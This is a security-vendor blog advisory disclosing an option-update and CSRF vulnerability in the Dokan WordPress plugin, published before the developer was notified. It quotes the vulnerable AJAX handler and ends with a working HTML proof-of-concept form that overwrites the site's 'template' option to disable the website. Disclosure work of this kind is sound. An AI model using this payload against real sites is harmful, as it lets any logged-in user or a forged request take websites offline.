12 Dec 2018

Our Proactive Monitor Caught Another Authenticated Option Update Vulnerability in a WordPress Plugin That Could Disable Websites

On Monday while disclosing another option update vulnerability we noted that in the wake of one of those being widely exploited recently we had focused on finding more of those vulnerabilities, while it appears no one else in the WordPress security has done that (maybe because they can get away with lying about failing to protect against the widely exploited one). And no sooner than the next day did we find yet another vulnerability. We spotted it during our proactive monitoring of changes being made to WordPress plugins to try to catch serious vulnerabilities when they are introduced in to plugins, though the vulnerable code was not flagged by the software that we use to identify possible issues for us to review, instead that had flagged another possible instance of that same type of vulnerability in the same code and when we went to manually review the code we found the issue.

While the vulnerability doesn’t appear to allow for takeover of a website, it would allow for anyone logged in to WordPress to disable the website with a single request. Since the plugin in question, Dokan, is only usable with the WooCommerce eCommerce plugin, which is often set to create WordPress accounts for those making orders, that means that many or most of the 10,000+ active installations of the plugins (according to wordpress.org) would be impacted. It could also be exploited by getting someone logged in to WordPress to access a page controlled by an attacker.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Technical Details

The plugin registers the function dismiss_upgrade_promo() to be accessible by anyone logged in to WordPress through its AJAX functionality:

35
add_action( 'wp_ajax_dokan-dismiss-upgrade-promotional-notice', array( $this, 'dismiss_upgrade_promo' ) );

That function, which is located in the file /lib/promotions.php, will update a WordPress option (setting) specified by the POST input “promo_key” to a value modified by the POST input “key”:

181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
public function dismiss_upgrade_promo() {
	if ( isset( $_POST['dokan_upgrade_promotion_dismissed'] ) && $_POST['dokan_upgrade_promotion_dismissed'] ) {
		$promo_option_key        = $_POST['promo_key'];
		$promo_last_display_time = $_POST['promo_key'] . '_displayed_time';
 
		$already_displayed_promo = get_option( $promo_option_key, array() );
 
		if ( ! isset( $already_displayed_promo[ $_POST['key'] ] ) ) {
			$already_displayed_promo[ $_POST['key'] ] = array(
				'display'        => 0,
				'last_displayed' => current_time( 'mysql' )
			);
		}
 
		update_option( $promo_option_key, $already_displayed_promo );

As we found when looking into another similar vulnerability, by replacing the “template” option with content like could be set with this you can disable the frontend and admin area of the website.

Since there is no check for a valid nonce, this could also be exploited through cross-site request forgery (CSRF).

Proof of Concept

The following proof of concept will break the website, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=dokan-dismiss-upgrade-promotional-notice" method="POST">
<input type="hidden" name="dokan_upgrade_promotion_dismissed" value="true" />
<input type="hidden" name="promo_key" value="template" />
<input type="hidden" name="key" value="test" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Leave a Reply

Your email address will not be published.